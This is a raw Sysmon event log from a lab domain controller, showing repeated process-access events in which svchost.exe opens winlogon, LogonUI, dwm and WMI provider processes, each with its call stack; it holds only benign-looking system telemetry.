13:29:53.717{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009476Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.701{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009475Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.701{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009474Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.701{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009473Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.701{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009472Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.701{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009471Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.701{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009470Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.701{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009469Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.701{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009468Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.701{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009467Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.701{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009466Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.701{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009465Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.701{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009464Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.670{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009463Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.623{08A6967A-4751-6000-0505-000000009A01}33444828C:\Windows\system32\LogonUI.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\logoncontroller.dll+2dfb5|C:\Windows\System32\RPCRT4.dll+50d64|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009462Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.623{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009461Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.623{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0505-000000009A01}3344C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009460Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.592{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0605-000000009A01}4632C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009459Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.592{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0605-000000009A01}4632C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009458Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.592{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0605-000000009A01}4632C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009457Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.467{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009456Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.467{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009455Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.467{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009454Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.467{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009453Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.467{08A6967A-4288-6000-1000-000000009A01}11362164C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0605-000000009A01}4632C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009452Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 